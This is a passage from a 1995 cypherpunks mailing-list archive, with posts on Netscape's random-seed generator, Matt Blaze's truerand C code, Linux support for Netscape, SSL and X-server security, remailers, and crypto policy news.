FAQ... Rob From bret at bjohns.win.net Sun Sep 24 16:32:56 1995 From: bret at bjohns.win.net (Bret A. Johnson) Date: Sun, 24 Sep 95 16:32:56 PDT Subject: Netscape for Linux? Message-ID: <1895@bjohns.win.net> >> > And the sad part is that now that they have announced that they are >> > dropping their unofficial Linux support, >> >> I have no current plans to alter our treatment of Linux. It is not now, >> nor has it ever been, a supported platform. We do build for it, >> and some people are happy about that. >> >> I have not constructed a business case which would cause Netscape >> to begin support for Linux versions of the Navigator. Right now, I'm >> not sure that making a point of this would do what you want. > >I'll say some people are happy about it. > >You just recently turned down an order for 230 copies of the netscape >navigator for Linux, and as you folks aren't making any money, you can >only wonder why. > >You have also turned numerous other attempts by varionus people to buy >both quantities of navigaors and server software for Linux. > >It seems to me that you folks are going out of your way to deny the >fact that the Linux market exists. I think that its because you are >embarassed that all these people with a $20 operating system are >throwing money at you while all the folks with $10K operating systems >aren't talking to you at all. That is ok! I just called there "Sales" dept. and asked for some info. to be sent to me on there serevers. I got 5 copies of what is on the WEB page. I could have done that. I asked him for prices and told him this was to present to a group of Marketing and Buss. type for a community system to bring Internet access to a whole county that does not have it now.. BTW, the system will be running on Suns and SGI's..... Oh well.. I thought they would do better than this. So far, there no better then sun at customer service... From sryan at reading.com Sun Sep 24 16:59:54 1995 From: sryan at reading.com (steven ryan) Date: Sun, 24 Sep 95 16:59:54 PDT Subject: Crypto in Wired Message-ID: <199509250000.UAA10758@zork.tiac.net> Good issue of Wired this month (10/95) Vic Sussman has a half page on PGPfone. Asked why he's giving away PGPfone with an inditement hanging over his head Zimmermann says "... I am a cryptographer. This is what I do". Banking with First Virtual by Andrew Leonard Anonymous Speech by Tom Bell Data Dicks by John Whalen Did you know you can recover data on magnetic media that's been written over up to nine times? These guys do - for a living. Wanna Bet by Evan I Schwartz Guess what's going to be the next killer app on the net. Steven Steven Ryan sryan at reading.com From mab at crypto.com Sun Sep 24 17:05:32 1995 From: mab at crypto.com (Matt Blaze) Date: Sun, 24 Sep 95 17:05:32 PDT Subject: `Random' seed. Message-ID: <199509250016.UAA19204@crypto.com> > I've played around with something that Matt posted here a while back > which seems to use the same idea. Matt suggested that this appears to > emit one random bit per second. I've done some very lightweight > analysis and haven't seen anything to suggest that the output is not > random, but I wouldn't make any bets based on what I've done. Here's my current favorite quick-and-dirty true-random-in-software generator. Use at own risk and read the comments carefully... -matt ===================cut here=========================== /* * Physically random numbers (very nearly uniform) * D. P. Mitchell * Modified by Matt Blaze 2/95 */ /* * The authors of this software are Don Mitchell and Matt Blaze. * Copyright (c) 1995 by AT&T. * Permission to use, copy, and modify this software without fee * is hereby granted, provided that this entire notice is included in * all copies of any software which is or includes a copy or * modification of this software and in all copies of the supporting * documentation for such software. * * This software may be subject to United States export controls. * * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED * WARRANTY. IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE. */ /* * WARNING: depending on the particular platform, truerand() output may * be biased or correlated. In general, you can expect about 16 bits of * "pseudo-entropy" out of each 32 bit word returned by truerand(), * but it may not be uniformly diffused. You should therefore run * the output through some post-whitening function (like MD5 or DES or * whatever) before using it to generate key material. (RSAREF's * random package does this for you when you feed truerand() bits to the * seed input function.) * * Test these assumptions on your own platform before fielding a system * based on this software or these techniques. * * This software seems to work well (at 16 bits per truerand() call) on * a Sun Sparc-20 under SunOS 4.1.3 and on a P100 under BSDI 2.0. You're * on your own elsewhere. */ #include #include #include #include #include static jmp_buf env; static unsigned count; static unsigned ocount; static unsigned buffer; static int tick() { struct itimerval it, oit; timerclear(&it.it_interval); it.it_value.tv_sec = 0; it.it_value.tv_usec = 16665; if (setitimer(ITIMER_REAL, &it, &oit) < 0) perror("tick"); } static void interrupt() { if (count) longjmp(env, 1); (void) signal(SIGALRM, interrupt); tick(); } static unsigned long roulette() { if (setjmp(env)) { count ^= (count>>3) ^ (count>>6) ^ ocount; count &= 0x7; ocount=count; buffer = (buffer<<3) ^ count; return buffer; } (void) signal(SIGALRM, interrupt); count = 0; tick(); for (;;) count++; /* about 1 MHz on VAX 11/780 */ } unsigned long truerand() { count=0; (void) roulette(); (void) roulette(); (void) roulette(); (void) roulette(); (void) roulette(); (void) roulette(); (void) roulette(); (void) roulette(); (void) roulette(); (void) roulette(); return roulette(); } int n_truerand(n) int n; { int slop, v; slop = 0x7FFFFFFF % n; do { v = truerand() >> 1; } while (v <= slop); return v % n; } From sameer at c2.org Sun Sep 24 17:38:13 1995 From: sameer at c2.org (sameer) Date: Sun, 24 Sep 95 17:38:13 PDT Subject: Netscape giving away T-shirts? Message-ID: <199509250033.RAA28349@infinity.c2.org> My ex-gf just told me on the phone that her boss mentioned that Netscape was giving away T-shirts to people who found holes. Apparently her boss saw this on the news. Interesting. ;-) (For the over-stressed and/or humor-impaired: I'm not implying that netscape is giving away t-shirts, just commenting on the accuracy of the media.) -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From eay at mincom.oz.au Sun Sep 24 17:47:19 1995 From: eay at mincom.oz.au (Eric Young) Date: Sun, 24 Sep 95 17:47:19 PDT Subject: SSL Man-in-the-middle In-Reply-To: <199509221407.KAA23176@gatekeeper.itribe.net> Message-ID: On Fri, 22 Sep 1995, David J. Bianco wrote: > Has anyone given much thought to the feasability of a man-in-the-middle > attack against an SSL (or other similar) transaction? To me, the > possibility seems obvious, so I figure it must have been discussed before, > though I haven't seen it. .... > Since neither the browser nor the server perform any authentication checks, > neither Bob nor Alice know they are really speaking to Mallet. The best > Alice can do is check the IP address of the client she's speaking to, but Ah, err, the infamious problem of Netscape Navigator refusing to talk to SSL httpd's because they don't have a certificate issued by Verisign is caused by the client authentication the Server certificate. To get a Verisign signed x509 certificate requires quite a bit of proof that your company is who they claim they are. So server authentication is used. eric -- Eric Young | Signature removed since it was generating AARNet: eay at mincom.oz.au | more followups than the message contents :-) From rfb at lehman.com Sun Sep 24 18:08:22 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Sun, 24 Sep 95 18:08:22 PDT Subject: Cybersecurity In-Reply-To: Message-ID: <9509250107.AA05910@cfdevx1.lehman.com> Date: Thu, 21 Sep 1995 06:13:40 -0400 (EDT) From: Duncan Frissell On Thu, 7 Sep 1995 hallam at w3.org wrote: > The UK laabour party is opposed to key escrow "we do not accept > the "clipper chip" argument". The Tories have less than half the > level of popular support an are barely recognisable as a > government. > > Phill Wait till Labour finds out that crypto makes "The Caring Society" impossible. Perhaps they'll change their view then. Ok, I'll bite. What do you mean? I'm guessing that you're talking about the fact that fully applied crypto (e. g. fully anonymous digital cash) makes it essentially impossible to base a tax system on income. With full application in place, a government would be forced to shift the basis of the tax system toward `real assets' and the receiving of goods and services within its borders. However, outside of transactions involving pure information exchange, this simply shifts things from one side to the other in a relationship where the basic ideas behind capitalism suggest that both sides should be more or less equal. That is, you're not taxed based on money changing hands, but rather on the more tangible things that are the reason for the money changing hands. To use the over-used grocery store example, you're taxed on what you carry out in your basket, without regard to any money that may or may not have changed hands before during or after you went to the store. Earnings tend to correlate reasonable well with receiving goods and services, at least over long periods of times. Also most people are more or less tied to a certain area of the world. Certainly there are exceptions, but the average case is more relevent when considering what sorts of governmental policies are possible. Given this, I think that crypto is more likely to result in a readjustment of the details than a fundamental change in the relationships between various elements of society. I don't mean to suggest that these relationships can't or won't change, just that strong crypto is not a magic pill that can transform everything by itself. Fundamental changes are the results of the interplay of a wide array of forces. -- Rick Busdiecker Please do not send electronic junk mail! net: rfb at lehman.com or rfb at cmu.edu PGP Public Key: 0xDBD9994D www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html send mail, subject "send index" for mailbot info, "send pgp key" gets my key From mixmaster at gondolin.org Sun Sep 24 18:14:30 1995 From: mixmaster at gondolin.org (Freedom Remailer) Date: Sun, 24 Sep 95 18:14:30 PDT Subject: No Subject Message-ID: <199509250105.UAA11700@anduin.gondolin.org> Post: Spy Agency Hoards Secret $1 Billion WASHINGTON (AP) - The super secret agency that manages the nation's spy satellite program has built up unspent funds totaling more than $1 billion without informing Congress or even its supervisors at the Pentagon and CIA, according to a published report. The Washington Post cited unidentified Capitol Hill sources in Sunday editions as saying the ability of the National Reconnaissance Organization to put away so much money from its classified multibillion-dollar budget reaffirmed concerns that intelligence agencies sometimes use their secret status to avoid accountability. The Post said the funds, called a "pot of gold" by one Senate aide, were discovered after the Senate intelligence committee raised questions more than a year ago about a $300 million new headquarters building the agency was building in suburban Virginia. The committee determined that the agency, not generally known to Congress, was using base operating funds it already had without seeking a specific appropriation for the building. The pool of unspent money accumulated as a result of NRO's practice of having Congress pay in advance for multiyear, billion-dollar-plus satellite programs, the Post quoted CIA Director John Deutch as saying in an interview. Agency managers let incoming funds pile up when spending on contracts took place at a slower pace than planned. Although he said a CIA inquiry found nothing illegal about how the NRO handled the money, Deutch told the Post he put a new chief financial officer in at the agency and ordered a "separate budget scrub" of all its programs. NRO's funding is part of the Pentagon budget, but many of the agency's intelligence programs are under CIA supervision. The Post said one congressional aide put the total of unspent funds as high as $1.7 billion, but that others said it could turn out to be less than $1 billion. It said Deutch declined to put a figure on the unspent money. Story Number: 00598 Story Date: 9/23/95 This material may not be redistributed. Copyright 1995. The Associated Press. All rights reserved. From ses at tipper.oit.unc.edu Sun Sep 24 18:25:28 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Sun, 24 Sep 95 18:25:28 PDT Subject: Important consequence of existence of compromised Netscape certificates In-Reply-To: <199509242121.RAA08234@frankenstein.piermont.com> Message-ID: There's one very important side-effect of the existence of a large number of compromised certificates accepted by navigator: the upgraded clients must either do CRL processing, or the roots used to sign all possibly compromised keys *must* be rejected by the fixed navigator. Simon From stevenw at iglou.com Sun Sep 24 18:28:23 1995 From: stevenw at iglou.com (Steven Weller) Date: Sun, 24 Sep 95 18:28:23 PDT Subject: Crypto in Wired Message-ID: >Good issue of Wired this month (10/95) > >Vic Sussman has a half page on PGPfone. Asked why he's giving away PGPfone >with an inditement hanging over his head Zimmermann says "... I am a >cryptographer. This is what I do". You need the full quote to get the real effect: <> That is a remarkably concise, intelligent, informative, unequivocal, savvy, and personal statement. Hats off to PZ (or whoever told him to say that). ------------------------------------------------------------------------- Steven Weller | "The Internet, of course, is more +1 415 390 9732 | than just a place to find pictures | of people having sex with dogs." stevenw at iglou.com | -- Time Magazine, 3 July 1995 From karlton at neon.netscape.com Sun Sep 24 19:39:47 1995 From: karlton at neon.netscape.com (Phil Karlton) Date: Sun, 24 Sep 95 19:39:47 PDT Subject: Netscape "random" number seed generator code available Message-ID: <4454nu$da8@tera.mcom.com> Once again I speak for myself and not Netscape. The random number seed generation code is now available for review: ftp://ftp1.netscape.com/pub/review/RNGsrc.tar.Z The README from that file is appended below. Netscape has fixed other less glaring but potentially interesting problems and those fixes will be included with the patch that goes out in the near future. As is mentioned in the README, more will need to be done to find more bits of entropy. (Too much of a good thing is still not enough.) However the security team believes that the RNG seed is no longer the weak link and candidate for attack. So I am personally volunteering to have my had shaved if a discovered deficiency in this code results in an easily attacked generated seed. [You will be expected to show your work. :-)] ============================== README =========================== This code represents the heart of Netscape's random number seed generator. The initialization routines are called by the various client front ends and servers and other Netscape software. Furthermore, the server will be putting seed information into the environment of each of the CGI invocations. Here's some things a client does: * Application specific files are passed to SEC_FileForRNG(). For the client this includes the global history file. * The clients then read a portion of the screen depending upon the current state of the hash. * The Update functions feed into an MD5 hash. The MD5 code isn't ours to publish. * User input is used for server side key generation and in client front ends for increasing RNG state entropy over time. This code needs to be portable. We can't access device specific registers that are not guaranteed to be on all relevant platforms. Recommendations to users of Netscape who rely on the security of their transactions: If the attacker has physical access to your machine, security cannot be assured. Netscape continues to point out that if unwanted agents can log into your machine, little can be secure. For secure servers, any insecure connection mechanism could be suspect. Multi-user UNIX platforms will not be as secure as single-user machines. Details: Some of the system specific information that is used in the seed generation is available to any user on that system. To help mitigate this, the entire user environment is passed into the seed generation algorithm. A wary user can alter his user environment before running Netscape software. If someone can get root (superuser) access to your machine, they can pretty much do anything. Netscape security could be weak if run on a platform emulator. Use a version native to the platform on which you are running. Details: Some of the usefulness of the seed generation depends upon the unpredictability of the low order bits of various clocks and timers. The clocks of many emulators may have much less entropy than the actual builtin clocks. If you are running on a UNIX platform, make sure of the security of your X server. This is also true if the X connection is not to a local machine as all of the events and the data from the screen read may be captured from the ethernet. Details: If the attacker is monitoring your user input then its randomness is not useful. It is better to perform some user action before connecting to a secure site. This means you should not set your home page to a secure site or launch your client from a command line to a secure site. Details: While navigating through menus or typing into various form fields, the Navigator uses the unpredictability of details of the user actions to increase the entropy of the RNG state. For this patch, proposed changes had to fit into the existing code and UI structure. We will rely on the user interactions leading to the initial secure page. In future versions, the Navigator will force the user to explicitly use the keyboard or mouse to help generate the initial seed before doing any secure transactions. That seed will be maintained across invocations of the Navigator. The files are not compilable as is. They have been extracted from the Netscape's cross platform build environment, and all of the headers needed to compile them are not included. They should be compilable with some simple edits on their platforms (MFC on Windows, CodeWarrior on Mac). ================================================================= PK -- -- Philip L. Karlton karlton at netscape.com Principal Curmudgeon http://www.netscape.com/people/karlton Netscape Communications Corporation From mixmaster at gondolin.org Sun Sep 24 19:49:38 1995 From: mixmaster at gondolin.org (Freedom Remailer) Date: Sun, 24 Sep 95 19:49:38 PDT Subject: No Subject Message-ID: <199509250241.VAA12182@anduin.gondolin.org> > Newsgroups: alt.privacy.anon-server > From: shamrock at netcom.com (Lucky Green) > Subject: The subtle danger of using Mixmaster > Message-ID: > Sender: shamrock at netcom19.netcom.com > Organization: NETCOM On-line Communication Services (408 261-4700 guest) > X-Newsreader: Yet Another NewsWatcher 2.0 > Date: Sun, 24 Sep 1995 19:51:30 GMT > Lines: 19 > > There are about twenty Mixmaster remailers. Reason to celebrate? Hardly. > Though we have more remailers than ever, I doubt that the twenty or so > Mixmasters are operated my more than six or seven people. I would not be > surprised to find out that some folks are running several Mixmasters on > the _same_ machine, using different IP addresses. > > While the enthusiasm for increasing the number of remailers is > understandable, the operation of more than one Mixmaster by the same > person is downright dangerous, because it reduces the effective lenght of > the remailer chain. The message that you sent through five remailers may > have only been handled by two operators. When you thought that five people > had to colaborate to trace your email, only two are in fact required to do > so. > > Comments? > > -- > -- Lucky Green > PGP encrypted mail preferred. > From bret at bjohns.win.net Sun Sep 24 19:59:07 1995 From: bret at bjohns.win.net (Bret A. Johnson) Date: Sun, 24 Sep 95 19:59:07 PDT Subject: What version of PGP? Message-ID: <1903@bjohns.win.net> I got PGP 262 off MIT. The file was PGP262si.tar Is this the international version with week crypto? os is it the US version? Thanks.... From rsalz at osf.org Sun Sep 24 20:50:11 1995 From: rsalz at osf.org (Rich Salz) Date: Sun, 24 Sep 95 20:50:11 PDT Subject: Defense against a class of programming bugs Message-ID: <9509250349.AA27055@sulphur.osf.org> >Unfortunately, strdup is not posix compliant. If you want to use >it and maintain portability, you'll have to write your own. Er, you're kidding, right? drand48 isn't in Posix either, for example. Someone who runs on Motif and Mac has strdup as the least of their worries. But just in case it's stopping anyone: char *strdup(const char *x) { char *p; return (p = malloc(strlen(x) + 1)) ? strcpy(p, x) : 0; } (Deliberately written too-cleverly. Lame compilers will need to cast to 0) From samman-ben at CS.YALE.EDU Sun Sep 24 20:50:36 1995 From: samman-ben at CS.YALE.EDU (Rev. Ben) Date: Sun, 24 Sep 95 20:50:36 PDT Subject: John Deutsch Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Is coming to Yale tomorrow and I'm going to get the opportunity to have tea with him(and about 10 other folks). Is there anyone here that has anything that they want me to ask the man? Ben. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQB1AwUBMGYm+r5ALmeTVXAJAQFeIQL9FmuCB93W4XANBdyQBOg224WW/sVetRI8 AZhM3HHjvNJ41YT7LCnRjLeRU1nUeBX1cI5MWBLNmKQXqR8+XmqboVU/k3jOxndy bNhH4rqb/zgH1cD65lo7IbTsVOJoHeDe =18Lm -----END PGP SIGNATURE----- From futplex at pseudonym.com Sun Sep 24 20:57:27 1995 From: futplex at pseudonym.com (Futplex) Date: Sun, 24 Sep 95 20:57:27 PDT Subject: Patents and trade secrets was: Encryption algorithms used in In-Reply-To: <306319E6@hamachi> Message-ID: <9509250357.AA21926@cs.umass.edu> David van Wie misattributed thus: > Perry E. Metzger at Sep 22, 95 01:19:37 am wrote: > > >David Van Wie writes: > >> It just moves the prior art date from the date of invention to the date > >> of filing the patent application. > > >What happens if the chronology goes like this ? > > > >(0) Alice invents a snaffleblort. > >(1) Bob invents a snaffleblort. > >(2) Bob files for a patent on a snaffleblort. > > > >From what you said, it would appear that Alice's prior art won't count when > >it comes to considering the validity of Bob's patent claim. Is that correct > ? I actually asked those questions, not Perry. Check your attributions, please. -Futplex From rsalz at osf.org Sun Sep 24 21:03:36 1995 From: rsalz at osf.org (Rich Salz) Date: Sun, 24 Sep 95 21:03:36 PDT Subject: John Deutsch Message-ID: <9509250402.AA27079@sulphur.osf.org> >Is there anyone here that has anything that they want me to ask the man? Why did he argue against MIT getting rid of Lincoln Labs? From jirib at sweeney.cs.monash.edu.au Sun Sep 24 21:06:43 1995 From: jirib at sweeney.cs.monash.edu.au (Jiri Baum) Date: Sun, 24 Sep 95 21:06:43 PDT Subject: real randomness for netscape - user clicking mouse In-Reply-To: Message-ID: <199509250402.OAA17312@sweeney.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello Vincent Cate and cypherpunks at toad.com and jsw at neon.netscape.com Vincent Cate wrote: [about getting entropy from mouse] > You must get the random bits from something that nobody else could watch. ... > other hand, an attacker would have to have broken the machine to get the > mouse info ... Not really... Have you ever been on an X system with host-based security (as opposed to xauth)? Anyone who has user login rights to the machine you're on (*) can just telnet in and open windows on your screen, blink the leds on your keyboard, install fonts, confine the mouse to a given screen area, etc. I understand that normally they can get a copy of every X event you get (and filter them), but I've never tried... (*) More accurately, any of the machines you can run X programs from. Mouse events might not be as secret as we would like... Jiri - -- If you want an answer, please mail to . On sweeney, I may delete without reading! PGP 463A14D5 (but it's at home so it'll take a day or two) PGP EF0607F9 (but it's at uni so don't rely on it too much) -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMGYpmyxV6mvvBgf5AQFkxwQAif9RTKJRW9IhZxd1zp4kmEdHbf4IkdMX OgEhgeMf6d9+iyTnwZJjR/YvSOsonueKHxR+gmQWotf5r9Y7FmLCFLxw8U0F5AF3 wUjQtqnTlWEU5jt57bn3KZFs5EFqdKKAgj9J7qLlflKd2Bm0mAXK4S8mWIP2U7xu Sl5UbU3KcqE= =zlW+ -----END PGP SIGNATURE----- From futplex at pseudonym.com Sun Sep 24 21:28:51 1995 From: futplex at pseudonym.com (Futplex) Date: Sun, 24 Sep 95 21:28:51 PDT Subject: Net KiddiePorn Hype on TV Message-ID: <9509250428.AA22310@cs.umass.edu> Yet Another Alarmist TV Show About Child Molesters on the Net: During their coverage of an NFL game on Sunday, the Fox announcers plugged an upcoming episode (sometime this week) of _New York Undercover_. They used a depressing line like "Think the Net is a safe place to play ? Think again !" Apparently the show will portray a child molester luring kids via the Net, etc., etc. "In a story pulled straight from today's headlines !" Anyway, the mainstream media trashing of the Net continues. Check your local listings. -Futplex From chen at intuit.com Sun Sep 24 21:51:52 1995 From: chen at intuit.com (Mark Chen) Date: Sun, 24 Sep 95 21:51:52 PDT Subject: macworld crypto articles In-Reply-To: <199509241745.NAA20271@toast.ai.mit.edu> Message-ID: <9509250445.AA19394@doom.intuit.com> > In article <4444rl$nrh at life.ai.mit.edu> Chen writes: > > It's truly a deplorable state of affairs. > > For the next version, include PGP free with every version of Quicken, > and have Quicken just "call" PGP. > > Of course, users can encrypt their files now with PGP. Is there an > Intuit bboard where someone could post instructions? This is a good idea. I'll bring it up with the appropriate people. Right now, we only have some cheesy forums going on Compuserve and Prodigy; however, keep your eyes peeled. We have other stuff in the works. - Mark - -- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From khijol!erc Sun Sep 24 22:22:41 1995 From: khijol!erc (Ed Carp [khijol SysAdmin]) Date: Sun, 24 Sep 95 22:22:41 PDT Subject: Colin Powell coming to Dallas Message-ID: <199509250514.AAA12608@khijol> -----BEGIN PGP SIGNED MESSAGE----- Colin Powell will be in Dallas at the Taylor's Bookstore out on Belt Line Rd. and Prestonwood (right next to Prestonwood Mall). October 3 at 6 PM. I plan to be there - anyone else from the DFW area going? Anyone have any questions they want asked (other than the usual "where do you stand on the administration's position regarding the use and exportation of so-called 'strong crypto' and the Clipper/Capstone fiasco"? - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGY6vSS9AwzY9LDxAQGLeQP/R9wlGd5wRImcP/37nX9oxAA8+ob2+QHX uCSgdVQOBEYWCEcUXXioa4YgOJx/aptrQBUI23IudEJMMbXTVnQeZx8DPFbzLERI cva9aHTVcQwp/tqOa8NSjvm5UtOC9YtSlyyfFDaH4Amai2dYUPFFZXhhLp6O6jLt PZ56cNfMRYk= =iIKo -----END PGP SIGNATURE----- From Mike_Spreitzer.PARC at xerox.com Sun Sep 24 22:30:44 1995 From: Mike_Spreitzer.PARC at xerox.com (Mike_Spreitzer.PARC at xerox.com) Date: Sun, 24 Sep 95 22:30:44 PDT Subject: secure file system for Linux? Message-ID: <95Sep24.223025pdt."15556(4)"@alpha.xerox.com> Is there a secure file system (or secure directory branch) for Linux? From warlord at MIT.EDU Sun Sep 24 22:50:05 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Sun, 24 Sep 95 22:50:05 PDT Subject: What version of PGP? In-Reply-To: <1903@bjohns.win.net> Message-ID: <199509250549.BAA20660@toxicwaste.media.mit.edu> > I got PGP 262 off MIT. > > The file was PGP262si.tar > > Is this the international version with week crypto? os is it the US > version? Actually, the file you got was pgp262s.tar.gz (or something equivalent.) Inside this tarfile you found pgp262si.tar, which is the Source, Internal tarfile. It is not am international version; it is the US version. Also, neither the US version nor any international versions have weak crypto. Enjoy! -derek From mch at squirrel.com Sun Sep 24 23:08:06 1995 From: mch at squirrel.com (Mark C. Henderson) Date: Sun, 24 Sep 95 23:08:06 PDT Subject: secure file system for Linux? Message-ID: <199509250608.XAA17676@squirrel.com> > Is there a secure file system (or secure directory branch) for Linux? Yes, you can use CFS, which works on several versions of UNIX as well as Linux. Send email to cfs at research.att.com to get a copy. Someone exported it, and it is also available from ftp://ftp.hacktic.nl/pub/crypto/CRYPTOapps/cfs.1.3.tar.gz There is also something called the "loop filesystem" for Linux. I haven't tried it and don't know how well it would integrate into the newer Linux kernels. ftp://tsx-11.mit.edu/pub/linux/BETA/loop -- Mark Henderson -- markh at wimsey.bc.ca, henderso at netcom.com, mch at squirrel.com PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46 cryptography archive maintainer -- ftp://ftp.wimsey.com/pub/crypto ftp://ftp.netcom.com/pub/he/henderso/change-sun-hostid-1.5.0.tar.gz From jsw at neon.netscape.com Sun Sep 24 23:16:43 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Sun, 24 Sep 95 23:16:43 PDT Subject: Netscape for Linux? In-Reply-To: <199509240436.VAA28304@ix5.ix.netcom.com> Message-ID: <445hej$h03@tera.mcom.com> In article <199509241746.KAA01423 at goblin.punk.net>, jsimmons at goblin.punk.net (Jeff Simmons) writes: > As a Linux user and advocate, I've gotta agree here. I'm glad that > Netscape is going to continue to supply us with an unsupported binary, > and I can't blame them a bit for not wanting to support an OS where > every user has his own private version number ... would be nice if we > could get 128 bit keys, though ... (hint, hint). We are working this issue with the government. As soon as we can make it available for download we will. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at neon.netscape.com Sun Sep 24 23:24:16 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Sun, 24 Sep 95 23:24:16 PDT Subject: Netscape for Linux? In-Reply-To: <3064BDFB.717F@netscape.com> Message-ID: <445hso$h03@tera.mcom.com> In article <199509242006.PAA02258 at khijol>, khijol!erc at uunet.uu.net (Ed Carp [khijol SysAdmin]) writes: > > > And the sad part is that now that they have announced that they are > > > dropping their unofficial Linux support, > > > > I have no current plans to alter our treatment of Linux. It is not now, > > nor has it ever been, a supported platform. We do build for it, > > and some people are happy about that. > > Does this mean that a Linux version of Netscape will no longer be > available, or that it *will* be available but unsupported? It will be available as it has been in the past, which means unsupported. That means that if you have a bug, and you try to call us for help, we will not provide it. > > I have not constructed a business case which would cause Netscape > > to begin support for Linux versions of the Navigator. Right now, I'm > > not sure that making a point of this would do what you want. > > That all depends on what you mean by "support". If you mean "we will no > longer make Netscape available for the Linux platform", that's not > support. If you mean "we will no longer respond to bug reports for > Netscape on this platform" then that's discontinuing support. We have never officially responded to bug reports on Linux. We do not take money for it for just this reason. This does not mean that we will not fix bugs that are reported via our feedback page. It doesn't mean we will fix them either... --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at neon.netscape.com Sun Sep 24 23:43:25 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Sun, 24 Sep 95 23:43:25 PDT Subject: Netscape "random" number seed generator code available In-Reply-To: <4454nu$da8@tera.mcom.com> Message-ID: <445j0o$h03@tera.mcom.com> In article <4454nu$da8 at tera.mcom.com>, karlton at neon.netscape.com (Phil Karlton) writes: > Details: While navigating through menus or typing into various form > fields, the Navigator uses the unpredictability of details of the > user actions to increase the entropy of the RNG state. Note that clicking in the main window or on URLs, and timing of network activity cause the state of the RNG to be updated. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at neon.netscape.com Sun Sep 24 23:46:33 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Sun, 24 Sep 95 23:46:33 PDT Subject: Netscape "random" number seed generator code available In-Reply-To: <4454nu$da8@tera.mcom.com> Message-ID: <445j6k$h03@tera.mcom.com> More on the RNG stuff. On Unix systems we look for ~/.pgp/randseed.bin, and feed it through the RNG hash. On Unix and PC systems we feed the environment through the hash, so that would be a good place for a concerned user to put some random stuff of their own. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From rjc at clark.net Sun Sep 24 23:49:16 1995 From: rjc at clark.net (Ray Cromwell) Date: Sun, 24 Sep 95 23:49:16 PDT Subject: New Netscape RNG Message-ID: <199509250649.CAA27099@clark.net> I just glanced at the new Netscape RNG source. I don't really see anything bad, but I haven't analyzed it. However, I'm curious as to why variables like the username or the language locality are used as sources of entropy. These seem to provide almost nil. The username is going to be pretty much constant. In fact, even the current directory which is used as a seed can't provide more than a few bits of entropy. In all probability, the user name will usually be the same, and so will the current directory (and how many directories are there? 65,000 would only give you 16 bits of entropy, assuming you get a directory listing from the machine) I'm thinking from the standpoint of someone gathering data on someone or some server to mount a specific attack. a "most common directories on the macintosh" file for instance could be used to attack the current directory method. Using those sources probably can't hurt, they just seemed like odd choices, "grasping for straws" so to speak. Nevertheless, I would like to commend Netscape for releasing the source code for public review. You guys are clearly an intelligent company, in both your current developments, but also the way you have handled this bad press. -Ray p.s. i hope you guys do a good internal review of your code to remove buffer overflow bugs From khijol!erc Sun Sep 24 23:52:53 1995 From: khijol!erc (Ed Carp [khijol SysAdmin]) Date: Sun, 24 Sep 95 23:52:53 PDT Subject: secure file system for Linux? In-Reply-To: <95Sep24.223025pdt."15556(4)"@alpha.xerox.com> Message-ID: <199509250630.BAA14157@khijol> -----BEGIN PGP SIGNED MESSAGE----- > Is there a secure file system (or secure directory branch) for Linux? The only one I know of is Matthew Blaze's CFS. - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGZMgiS9AwzY9LDxAQFChwQAofOU1QkLKwhYYxO7GFvmFk03w3mFv/nb J4QIkpFK85m1GIjlgl1rwb5sOWWoMkE/OeSRWQ6hm7OhF5VWl9NdfbqDJJBZO7pf OUj1YjlegF3s1hFDyqv0qIgceSqhN5tEVtA6K5jdOP1mTNF/L8ODmcMKIHzrArD7 UEFKaUd5XiU= =17aw -----END PGP SIGNATURE----- From alano at teleport.com Mon Sep 25 00:05:17 1995 From: alano at teleport.com (Alan Olsen) Date: Mon, 25 Sep 95 00:05:17 PDT Subject: Netscape giving away T-shirts? Message-ID: <199509250705.AAA26210@desiree.teleport.com> At 05:33 PM 9/24/95 -0700, you wrote: > My ex-gf just told me on the phone that her boss mentioned >that Netscape was giving away T-shirts to people who found holes. >Apparently her 